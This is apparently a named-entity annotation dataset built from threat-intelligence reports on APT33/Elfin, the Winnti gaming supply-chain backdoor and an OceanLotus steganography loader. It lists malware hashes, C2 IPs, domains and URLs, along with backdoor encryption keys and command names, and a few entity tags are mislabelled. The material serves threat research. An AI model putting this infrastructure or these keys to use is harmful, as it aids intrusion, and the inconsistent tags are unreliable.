O + +Activity O +continued O +throughout O +April S-TIME +where O +additional O +versions O +of O +DarkComet S-MAL +, O +POSHC2 S-MAL +implants O +, O +and O +an O +AutoIt B-MAL +backdoor E-MAL +were O +deployed O +along O +with O +further O +credential O +dumping O +activities O +. O + +Elfin S-APT +is O +one O +of O +the O +most O +active O +groups O +currently O +operating O +in O +the O +Middle B-LOC +East E-LOC +, O +targeting O +a O +large O +number O +of O +organizations O +across O +a O +diverse O +range O +of O +sectors O +. O + +Over O +the O +past O +three O +years O +, O +the O +group O +has O +utilized O +a O +wide O +array O +of O +tools O +against O +its O +victims O +, O +ranging O +from O +custom O +built O +malware O +to O +off-the-shelf O +RATs O +, O +indicating O +a O +willingness O +to O +continually O +revise O +its O +tactics O +and O +find O +whatever O +tools O +it O +takes O +to O +compromise O +its O +next O +set O +of O +victims O +. O + +Symantec O +has O +the O +following O +protection O +in O +place O +to O +protect O +customers O +against O +these O +attacks O +, O +APT33 S-APT +: O +Backdoor.Notestuk S-MAL +Trojan.Stonedrill S-MAL +Backdoor.Remvio S-MAL +Backdoor.Breut S-MAL +Trojan.Quasar S-MAL +Backdoor.Patpoopy S-MAL +Trojan.Nancrat S-MAL +Trojan.Netweird.B S-MAL +Exp.CVE-2018-20250 S-VULID +SecurityRisk.LaZagne S-MAL +Hacktool.Mimikatz S-MAL +SniffPass S-MAL +. O + +APT33 S-APT +: O +5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP S-MAL +. O + +APT33 S-APT +: O +a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt B-MAL +backdoor E-MAL +. O + +APT33 S-APT +: O +f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword S-MAL +. O + +APT33 S-APT +: O +87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne S-MAL +. 
O + +APT33 S-APT +: O +709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 S-SHA2 LaZagne S-MAL +. O + +APT33 S-APT +: O +a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar B-MAL +RAT E-MAL +. O + +APT33 S-APT +: O +0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar B-MAL +RAT E-MAL +. O + +APT33 S-APT +: O +d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar B-MAL +RAT E-MAL +. O + +APT33 S-APT +: O +ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos S-MAL +. O + +APT33 S-APT +: O +e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos S-MAL +. O + +APT33 S-APT +: O +018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos S-MAL +. O + +APT33 S-APT +: O +367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos S-MAL +. O + +APT33 S-APT +: O +ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos S-MAL +. O + +APT33 S-APT +: O +6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass S-MAL +. O + +APT33 S-APT +: O +bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet S-MAL +. O + +APT33 S-APT +: O +af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet S-MAL +. O + +APT33 S-APT +: O +c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt B-MAL +FTP E-MAL +tool O +. O + +APT33 S-APT +: O +99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET B-MAL +FTP E-MAL +tool O +. O + +APT33 S-APT +: O +94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell B-MAL +downloader E-MAL +( O +registry.ps1 S-MAL +) O +. O + +APT33 S-APT +: O +dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 B-MAL +backdoor E-MAL +. O + +APT33 S-APT +: O +95.211.191.117 S-IP +update-sec.com S-DOM +. 
O + +APT33 S-APT +: O +8.26.21.120 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +162.250.145.234 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +91.235.142.76 S-IP +mywinnetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.119 S-IP +hyperservice.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.120 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +213.252.244.14 S-IP +service-avant.com S-DOM +. O + +APT33 S-APT +: O +91.235.142.124 S-IP +mywinnetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.120 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +162.250.145.234 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +91.235.142.76 S-IP +mywinnetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.120 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.120 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +95.211.191.117 S-IP +update-sec.com S-DOM +. O + +APT33 S-APT +: O +5.187.21.70 S-IP +microsoftupdated.com S-DOM +. O + +APT33 S-APT +: O +217.13.103.46 S-IP +securityupdated.com S-DOM +. O + +APT33 S-APT +: O +8.26.21.120 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +5.187.21.71 S-IP +backupnet.ddns.net S-DOM +. O + +APT33 S-APT +: O +91.230.121.143 S-IP +backupnet.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.119 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.117 S-IP +srvhost.servehttp.com S-DOM +. O + +APT33 S-APT +: O +37.48.105.178 S-IP +servhost.hopto.org S-DOM +. O + +APT33 S-APT +: O +8.26.21.117 S-IP +srvhost.servehttp.com S-DOM +. O + +APT33 S-APT +: O +5.187.21.70 S-DOM +microsoftupdated.com S-DOM +. O + +APT33 S-APT +: O +64.251.19.214 S-DOM +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.217 S-DOM +[REDACTED].servehttp.com S-DOM +. O + +APT33 S-APT +: O +64.251.19.214 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.214 S-IP +mynetwork.ddns.net S-DOM +. 
O + +APT33 S-APT +: O +64.251.19.214 S-IP +[REDACTED].sytes.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.217 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.216 S-IP +srvhost.servehttp.com S-DOM +. O + +APT33 S-APT +: O +64.251.19.217 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.217 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.215 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.217 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.216 S-IP +[REDACTED].myftp.org S-DOM +. O + +APT33 S-APT +: O +64.251.19.232 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.214 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +162.250.145.204 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +188.165.4.81 S-IP +svcexplores.com S-DOM +. O + +APT33 S-APT +: O +64.251.19.231 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.231 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.232 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.216 S-IP +[REDACTED].myftp.biz S-DOM +. O + +APT33 S-APT +: O +91.230.121.143 S-IP +remote-server.ddns.net S-DOM +. O + +APT33 S-APT +: O +162.250.145.222 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +64.251.19.216 S-IP +[REDACTED].redirectme.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.222 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.223 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +217.147.168.44 S-IP +remserver.ddns.net S-DOM +. O + +APT33 S-APT +: O +195.20.52.172 S-IP +mynetwork.cf S-DOM +. O + +APT33 S-APT +: O +8.26.21.221 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.220 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +8.26.21.221 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +91.230.121.144 S-IP +remserver.ddns.net S-DOM +. 
O + +APT33 S-APT +: O +89.34.237.118 S-IP +mywinnetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.35 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +5.79.127.177 S-IP +mypsh.ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.35 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.35 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.35 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.36 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.37 S-IP +mynetwork.ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.38 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.39 S-IP +remote-server.ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.40 S-IP +[REDACTED].ddns.net S-DOM +. O + +APT33 S-APT +: O +192.119.15.41 S-IP +mynetwork.cf S-DOM +. O + +APT33 S-APT +: O +192.119.15.42 S-IP +[REDACTED].ddns.net S-DOM +. O + + +gaming O +industry O +scope O +attackers O +asia O +. O + +This O +is O +not O +the O +first O +time O +the O +gaming O +industry O +has O +been O +targeted O +by O +attackers O +who O +compromise O +game O +developers O +, O +insert O +backdoors O +into O +a O +game’s O +build O +environment O +, O +and O +then O +have O +their O +malware O +distributed O +as O +legitimate O +software O +. O + +In O +April B-TIME +2013 E-TIME +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +reported O +that O +a O +popular O +game O +was O +altered O +to O +include O +a O +backdoor O +in O +2011 S-TIME +. O + +That O +attack O +was O +attributed O +to O +perpetrators O +Kaspersky S-SECTEAM +called O +the O +Winnti S-APT +Group O +. O + +Yet O +again O +, O +new O +supply-chain B-ACT +attacks E-ACT +recently O +caught O +the O +attention O +of O +ESET S-SECTEAM +Researchers O +. O + +This O +time O +, O +two O +games O +and O +one O +gaming O +platform O +application O +were O +compromised O +to O +include O +a O +backdoor O +. 
O + +Given O +that O +these O +attacks O +were O +mostly O +targeted O +against O +Asia S-LOC +and O +the O +gaming O +industry O +, O +it O +shouldn’t O +be O +surprising O +they O +are O +the O +work O +of O +the O +group O +described O +in O +Kaspersky S-SECTEAM +’s O +“ O +Winnti S-APT +– O +More O +than O +just O +a O +game O +” O +. O + +Although O +the O +malware O +uses O +different O +configurations O +in O +each O +case O +, O +the O +three O +affected O +software O +products O +included O +the O +same O +backdoor O +code O +and O +were O +launched O +using O +the O +same O +mechanism O +. O + +While O +two O +of O +the O +compromised O +products O +no O +longer O +include O +the O +backdoor O +, O +one O +of O +the O +affected O +developers O +is O +still O +distributing O +the O +trojanized O +version O +: O +ironically O +, O +the O +game O +is O +named O +Infestation O +, O +and O +is O +produced O +by O +Thai S-LOC +developer O +Electronics B-IDTY +Extreme E-IDTY +. O + +We O +have O +tried O +informing O +them O +several O +times O +, O +through O +various O +channels O +, O +since O +early O +February S-TIME +, O +but O +without O +apparent O +success O +. O + +Let’s O +look O +at O +how O +the O +malicious O +payload O +is O +embedded O +and O +then O +look O +into O +the O +details O +of O +the O +backdoor O +itself O +. O + +The O +payload O +code O +is O +started O +very O +early O +during O +the O +execution O +of O +the O +backdoored O +executable O +file O +. O + +Right O +after O +the O +PE O +entry O +point O +, O +the O +standard O +call O +to O +the O +C O +Runtime O +initialization O +( O +__scrt_common_main_seh S-TOOL +) O +is O +hooked O +to O +launch O +the O +malicious O +payload O +before O +everything O +else O +. O + +This O +may O +suggest O +that O +the O +malefactor O +changed O +a O +build O +configuration O +rather O +than O +the O +source O +code O +itself O +. 
O + +The O +code O +added O +to O +the O +executable O +decrypts O +and O +launches O +the O +backdoor O +in-memory O +before O +resuming O +normal O +execution O +of O +the O +C O +Runtime O +initialization O +code O +and O +all O +the O +subsequent O +code O +of O +the O +host O +application O +. O + +The O +embedded O +payload O +data O +has O +a O +specific O +structure O +, O +that O +is O +parsed O +by O +the O +added O +unpacking O +code O +. O + +It O +includes O +an O +RC4 B-TOOL +key E-TOOL +( O +which O +is O +XORed B-TOOL +with I-TOOL +0x37 E-TOOL +) O +that O +is O +used O +to O +decrypt O +a O +filename O +and O +the O +embedded O +DLL S-TOOL +file O +. O + +The O +actual O +malicious O +payload O +is O +quite O +small O +and O +only O +contains O +about O +17 O +KB O +of O +code O +and O +data O +. O + +The O +configuration O +data O +is O +simply O +a O +whitespace-separated O +list O +of O +strings O +. O + +The O +configuration O +consists O +of O +four O +fields O +: O + +C&C O +server O +URL O +. O + +Variable O +( O +t O +) O +used O +to O +determine O +the O +time O +to O +sleep O +in O +milliseconds O +before O +continuing O +the O +execution O +. O + +Wait O +time O +is O +chosen O +randomly O +in O +the O +range O +2/3 O +t O +to O +5/3 O +t +. O + +A O +string O +identifying O +a O +campaign O +. O + +A O +semicolon-separated O +list O +of O +executable O +filenames O +. O + +If O +any O +of O +them O +are O +running O +, O +the O +backdoor O +stops O +its O +execution O +. O + +ESET S-SECTEAM +researchers O +have O +identified O +five O +versions O +of O +the O +payload O +: O + +Winnti S-APT +: O +a045939f O +2018-07-11 B-TIME +15:45:57 E-TIME +https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL +. O + +Winnti S-APT +: O +a260dcf1 O +2018-07-11 B-TIME +15:45:57 E-TIME +https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL +. 
O + +Winnti S-APT +: O +dde82093 O +2018-07-11 B-TIME +15:45:57 E-TIME +https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL +. O + +Winnti S-APT +: O +44260a1d O +2018-08-15 B-TIME +10:59:09 E-TIME +https://dump.gxxservice.com/common/up/up_base.php S-URL +. O + +Winnti S-APT +: O +8272c1f4 O +2018-11-01 B-TIME +13:16:24 E-TIME +https://nw.infestexe.com/version/last.php S-URL +. O + +In O +the O +first O +three O +variants O +, O +the O +code O +was O +not O +recompiled O +, O +but O +the O +configuration O +data O +was O +edited O +in O +the O +DLL S-TOOL +file O +itself O +. O + +The O +rest O +of O +the O +content O +is O +a O +byte O +for O +byte O +copy O +. O + +Domain O +names O +were O +carefully O +chosen O +to O +look O +like O +they O +are O +related O +to O +the O +game O +or O +application O +publisher O +. O + +The O +apex O +domain O +was O +set O +to O +redirect O +to O +a O +relevant O +legitimate O +site O +using O +the O +Namecheap S-TOOL +redirection O +service O +, O +while O +the O +subdomain O +points O +to O +the O +malicious O +C&C O +server O +. O + +Winnti S-APT +: O +xigncodeservice.com S-DOM +2018-07-10 B-TIME +09:18:17 E-TIME +https://namu.wiki/w/XIGNCODE S-URL +. O + +Winnti S-APT +: O +gxxservice.com S-DOM +2018-08-14 B-TIME +13:53:41 E-TIME +None O +or O +unknown O +. O + +Winnti S-APT +: O +infestexe.com S-DOM +2018-11-07 B-TIME +08:46:44 E-TIME +https://www.facebook.com/infest.in.th S-URL +. O + +Winnti S-APT +: O +bugcheck.xigncodeservice.com S-DOM +167.99.106.49 S-IP +, O +178.128.180.206 S-IP +DigitalOcean S-IDTY +. O + +Winnti S-APT +: O +dump.gxxservice.com S-DOM +142.93.204.230 S-IP +DigitalOcean S-IDTY +. O + +Winnti S-APT +: O +nw.infestexe.com S-DOM +138.68.14.195 S-IP +DigitalOcean S-IDTY +. O + +At O +the O +time O +of O +writing O +, O +none O +of O +the O +domains O +resolve O +and O +the O +C&C O +servers O +are O +not O +responding O +. 
O + +A O +bot O +identifier O +is O +generated O +from O +the O +machine’s O +MAC O +address O +. O + +The O +backdoor O +reports O +information O +about O +the O +machine O +such O +as O +the O +user O +name O +, O +computer O +name O +, O +Windows S-OS +version O +and O +system O +language O +to O +the O +C&C O +server O +and O +awaits O +commands O +. O + +The O +data O +is O +XOR S-TOOL +encrypted O +with O +the O +key O +“ O +*&b0i0rong2Y7un1 O +” O +and O +base64-encoded S-ENCR +. O + +The O +data O +received O +from O +the O +C&C O +server O +is O +encrypted O +using O +the O +same O +key O +. O + +This O +simple O +backdoor O +has O +only O +four O +commands O +that O +can O +be O +used O +by O +the O +attacker O +: O + +DownUrlFile O +DownRunUrlFile O +RunUrlBinInMem O +UnInstall O +. O + +The O +commands O +are O +pretty O +much O +self-explanatory O +. O + +They O +allow O +the O +attacker O +to O +run O +additional O +executables O +from O +a O +given O +URL O +. O + +The O +last O +one O +is O +perhaps O +less O +obvious O +. O + +The O +UnInstall O +command O +doesn’t O +remove O +the O +malware O +from O +the O +system O +. O + +After O +all O +, O +it O +is O +embedded O +inside O +a O +legitimate O +executable O +that O +still O +needs O +to O +run O +. O + +Rather O +than O +removing O +anything O +, O +it O +disables O +the O +malicious O +code O +by O +setting O +the O +following O +registry O +value O +to O +1: O +HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ImageFlag O +. O + +When O +the O +payload O +is O +started O +, O +the O +registry O +value O +is O +queried O +and O +execution O +is O +aborted O +if O +set O +. O + +Perhaps O +the O +attackers O +are O +trying O +to O +reduce O +the O +load O +from O +their O +C&C O +servers O +by O +avoiding O +callbacks O +from O +uninteresting O +victims O +. 
O + +Based O +on O +ESET S-SECTEAM +telemetry O +, O +one O +of O +the O +second O +stage O +payload O +delivered O +to O +victims O +is O +Win64/Winnti.BN S-FILE +. O + +As O +far O +as O +we O +can O +tell O +, O +its O +dropper O +was O +downloaded O +over O +HTTPS O +from O +api.goallbandungtravel.com S-DOM +. O + +We O +have O +seen O +it O +installed O +as O +a O +Windows S-OS +service O +and O +as O +a O +DLL S-TOOL +in O +C:\Windows\System32 O +using O +the O +following O +file O +names O +: O + +cscsrv.dll S-FILE +dwmsvc.dll S-FILE +iassrv.dll S-FILE +mprsvc.dll S-FILE +nlasrv.dll S-FILE +powfsvc.dll S-FILE +racsvc.dll S-FILE +slcsvc.dll S-FILE +snmpsvc.dll S-FILE +sspisvc.dll S-FILE +. O + +The O +samples O +we O +have O +analyzed O +were O +actually O +quite O +large O +, O +each O +of O +them O +about O +60 O +MB O +. O + +This O +is O +, O +however O +, O +only O +for O +appearance O +because O +the O +real O +size O +or O +the O +PE O +file O +is O +between O +63 O +KB O +and O +72 O +KB O +, O +depending O +on O +the O +version O +. O + +The O +malware O +files O +simply O +have O +lots O +of O +clean O +files O +appended O +to O +them O +. O + +This O +is O +probably O +done O +by O +the O +component O +that O +drops O +and O +installs O +this O +malicious O +service O +. O + +Once O +the O +service O +runs O +, O +it O +appends O +the O +extension O +.mui O +to O +its O +DLL S-TOOL +path O +, O +reads O +that O +file O +and O +decrypts O +it O +using O +RC5 S-TOOL +. O + +The O +decrypted O +MUI O +file O +contains O +position-independent O +code O +at O +offset O +0 O +. O + +The O +RC5 S-TOOL +key O +is O +derived O +from O +the O +hard O +drive O +serial O +number O +and O +the O +string O +“ O +f@Ukd!rCto O +R$. O +” O +— O +we O +were O +not O +able O +to O +obtain O +any O +MUI O +files O +nor O +the O +code O +that O +installs O +them O +in O +the O +first O +place O +. 
O + +Thus O +, O +we O +do O +not O +know O +the O +exact O +purpose O +of O +this O +malicious O +service O +. O + +Recent O +versions O +of O +the O +malware O +include O +an O +“ O +auto-update O +” O +mechanism O +, O +using O +C&C O +server O +http://checkin.travelsanignacio.com S-URL +. O + +That O +C&C O +server O +served O +the O +latest O +version O +of O +the O +MUI O +files O +encrypted O +with O +a O +static O +RC5 S-TOOL +key O +. O + +The O +C&C O +server O +was O +not O +responding O +during O +our O +analysis O +. O + +Let’s O +start O +with O +who O +is O +not O +targeted O +. O + +Early O +in O +the O +payload O +, O +the O +malware O +checks O +to O +see O +if O +the O +system O +language O +is O +Russian O +or O +Chinese O +. O + +In O +either O +case O +, O +the O +malware O +stops O +running O +. O + +There O +is O +no O +way O +around O +this O +: O +the O +attackers O +are O +simply O +not O +interested O +in O +computers O +configured O +with O +those O +languages O +. O + +ESET S-SECTEAM +telemetry O +shows O +victims O +are O +mostly O +located O +in O +Asia S-LOC +, O +with O +Thailand S-LOC +having O +the O +largest O +part O +of O +the O +pie O +. O + +Given O +the O +popularity O +of O +the O +compromised O +application O +that O +is O +still O +being O +distributed O +by O +its O +developer O +, O +it O +wouldn’t O +be O +surprising O +if O +the O +number O +of O +victims O +is O +in O +the O +tens O +or O +hundreds O +of O +thousands O +. O + +Supply-chain B-ACT +attacks E-ACT +are O +hard O +to O +detect O +from O +the O +consumer O +perspective O +. O + +It O +is O +impossible O +to O +start O +analyzing O +every O +piece O +of O +software O +we O +run O +, O +especially O +with O +all O +the O +regular O +updates O +we O +are O +encouraged O +or O +required O +to O +install O +. O + +So O +, O +we O +put O +our O +trust O +in O +software O +vendors O +that O +the O +files O +they O +distribute O +don’t O +include O +malware O +. 
O + +Perhaps O +that’s O +the O +reason O +multiple O +groups O +target O +software O +developers O +: O +compromising O +the O +vendor O +results O +in O +a O +botnet O +as O +popular O +as O +the O +software O +that O +is O +hacked O +. O + +However O +, O +there O +is O +a O +downside O +of O +using O +such O +a O +technique O +: O +once O +the O +scheme O +is O +uncovered O +, O +the O +attacker O +loses O +control O +and O +computers O +can O +be O +cleaned O +through O +regular O +updates O +. O + +We O +do O +not O +know O +the O +motives O +of O +the O +attackers O +at O +this O +point O +. O + +Is O +it O +simply O +financial O +gain? O +Are O +there O +any O +reasons O +why O +the O +three O +affected O +products O +are O +from O +Asian O +developers O +and O +for O +the O +Asian O +market? O +Do O +these O +attackers O +use O +a O +botnet O +as O +part O +of O +a O +larger O +espionage O +operation? O +ESET S-SECTEAM +products O +detect O +this O +threat O +as O +Win32/HackedApp.Winnti.A S-FILE +, O +Win32/HackedApp.Winnti.B S-FILE +, O +the O +payload O +as O +Win32/Winnti.AG S-FILE +, O +and O +the O +second O +stage O +as O +Win64/Winnti.BN S-FILE +. O + +Compromised O +file O +samples O +( O +Win32/HackedApp.Winnti.A B-FILE +and I-FILE +B E-FILE +) O + +Winnti S-APT +: O +7cf41b1acfb05064518a2ad9e4c16fde9185cd4b S-SHA1 +Tue B-TIME +Nov I-TIME +13 I-TIME +10:12:58 I-TIME +2018 E-TIME +1729131071 O +8272c1f4 O +. O + +Winnti S-APT +: O +7f73def251fcc34cbd6f5ac61822913479124a2a S-SHA1 +Wed B-TIME +Nov I-TIME +14 I-TIME +03:50:18 I-TIME +2018 E-TIME +19317120 O +44260a1d O +. O + +Winnti S-APT +: O +dac0bd8972f23c9b5f7f8f06c5d629eac7926269 S-SHA1 +Tue B-TIME +Nov I-TIME +27 I-TIME +03:05:16 I-TIME +2018 E-TIME +1729131071 O +8272c1f4 O +. O + +Some O +hashes O +were O +redacted O +per O +request O +from O +one O +of O +the O +vendor O +. 
O + +If O +for O +a O +particular O +reason O +you O +need O +them O +, O +reach O +out O +to O +us O +at O +threatintel@eset.com O +. O + +Payload O +Samples O +( O +Win32/Winnti.AG S-FILE +) O + +Winnti S-APT +: O +a045939f53c5ad2c0f7368b082aa7b0bd7b116da S-SHA1 +https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL +. O + +Winnti S-APT +: O +a260dcf193e747cee49ae83568eea6c04bf93cb3 S-SHA1 +https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL +. O + +Winnti S-APT +: O +dde82093decde6371eb852a5e9a1aa4acf3b56ba S-SHA1 +https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL +. O + +Winnti S-APT +: O +8272c1f41f7c223316c0d78bd3bd5744e25c2e9f S-SHA1 +https://nw.infestexe.com/version/last.php S-URL +. O + +Winnti S-APT +: O +44260a1dfd92922a621124640015160e621f32d5 S-SHA1 +https://dump.gxxservice.com/common/up/up_base.php S-URL +. O + +Second O +stage O +samples O +( O +Win64/Winnti.BN S-FILE +) O + +Winnti S-APT +: O +Dropper O +delivered O +by O +api.goallbandungtravel.com S-DOM +. O + +Winnti S-APT +: O +4256fa6f6a39add6a1fa10ef1497a74088f12be0 S-SHA1 +2018-07-25 B-TIME +10:13:41 E-TIME +None O +. O + +Winnti S-APT +: O +bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 S-SHA1 +2018-10-10 B-TIME +09:57:31 E-TIME +http://checkin.travelsanignacio.com S-URL +. O + +Winnti S-APT +: O +T1195 O +Supply O +Chain O +Compromise O +. O + +Winnti S-APT +: O +T1050 O +New O +Service O +. O + +Winnti S-APT +: O +T1022 O +Data O +Encrypted O +. O + +Winnti S-APT +: O +T1079 O +Multilayer O +Encryption O +. O + +Winnti S-APT +: O +T1032 O +Standard O +Cryptographic O +Protocol O +( O +RC4 S-ENCR +, O +RC5 O +) O +. O + +Winnti S-APT +: O +T1043 O +Commonly O +Used O +Port O +( O +80 O +, O +443 O +) O +. O + + +OceanLotus S-APT +Steganography O +Malware O +Analysis O +White O +Paper O +. 
O + +While O +continuing O +to O +monitor O +activity O +of O +the O +OceanLotus S-APT +APT O +Group O +, O +BlackBerry B-SECTEAM +Cylance E-SECTEAM +researchers O +uncovered O +a O +novel O +payload O +loader O +that O +utilizes O +steganography O +to O +read O +an O +encrypted O +payload O +concealed O +within O +a O +.png O +image O +file O +. O + +The O +steganography O +algorithm O +appears O +to O +be O +bespoke O +and O +utilizes O +a O +least O +significant O +bit O +approach O +to O +minimize O +visual O +differences O +when O +compared O +with O +the O +original O +image O +to O +prevent O +analysis O +by O +discovery O +tools O +. O + +Once O +decoded O +, O +decrypted O +, O +and O +executed O +, O +an O +obfuscated O +loader O +will O +load O +one O +of O +the O +APT32 S-APT +backdoors O +. O + +Thus O +far O +, O +BlackBerry B-SECTEAM +Cylance E-SECTEAM +has O +observed O +two O +backdoors O +being O +used O +in O +combination O +with O +the O +steganography O +loader O +– O +a O +version O +of O +Denes B-MAL +backdoor E-MAL +( O +bearing O +similarities O +to O +the O +one O +described O +by O +ESET S-SECTEAM +) O +, O +and O +an O +updated O +version O +of O +Remy B-MAL +backdoor E-MAL +. O + +However O +, O +this O +can O +be O +easily O +modified O +by O +the O +threat O +actor O +to O +deliver O +other O +malicious O +payloads O +. O + +The O +complexity O +of O +the O +shellcode O +and O +loaders O +shows O +the O +group O +continues O +to O +invest O +heavily O +in O +development O +of O +bespoke O +tooling O +. O + +This O +white O +paper O +describes O +the O +steganography O +algorithm O +used O +in O +two O +distinct O +loader O +variants O +and O +looks O +at O +the O +launcher O +of O +the O +backdoor O +that O +was O +encoded O +in O +one O +of O +the O +.png O +cover O +images O +. 
O +mcvsocfg.dll S-FILE +: O + +ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2 +Malware/Backdoor O +659 O +KB O +( O +674 O +, O +816 O +bytes O +) O +PE32 O +executable O +for O +MS O +Windows S-OS +( O +DLL S-TOOL +) O +( O +console O +) O +Intel S-IDTY +80386 O +32-bit O +September B-TIME +2018 E-TIME +. O + +This O +particular O +OceanLotus S-APT +malware O +loader O +attempts O +to O +imitate O +McAfee S-S-SECTEAM +’s O +McVsoCfg B-TOOL +DLL E-TOOL +and O +expects O +to O +be O +side-loaded O +by O +the O +legitimate O +" O +On O +Demand O +Scanner O +" O +executable O +. O + +It O +arrives O +together O +with O +an O +encrypted O +payload O +stored O +in O +a O +separate O +.png O +image O +file O +. O + +The O +.png O +cover O +file O +is O +actually O +a O +valid O +image O +file O +that O +is O +not O +malicious O +on O +its O +own O +. O + +The O +payload O +is O +encoded O +inside O +this O +image O +with O +the O +use O +of O +a O +technique O +called O +steganography O +, O +which O +utilizes O +the O +least O +significant O +bits O +of O +each O +pixel’s O +color O +code O +to O +store O +hidden O +information O +, O +without O +making O +overtly O +visible O +changes O +to O +the O +picture O +itself O +. O + +The O +encoded O +payload O +is O +additionally O +encrypted O +with O +AES128 S-ENCR +and O +further O +obfuscated O +with O +XOR S-TOOL +in O +an O +attempt O +to O +fool O +steganography O +detection O +tools O +. O + +Features O +: O + +Side-loaded O +DLL S-TOOL +Loads O +next-stage O +payload O +using O +custom B-TOOL +.png I-TOOL +steganography E-TOOL +Uses O +AES128 S-ENCR +implementation O +from O +Crypto++ B-TOOL +library E-TOOL +for O +payload O +decryption O +Known O +to O +load O +Denes 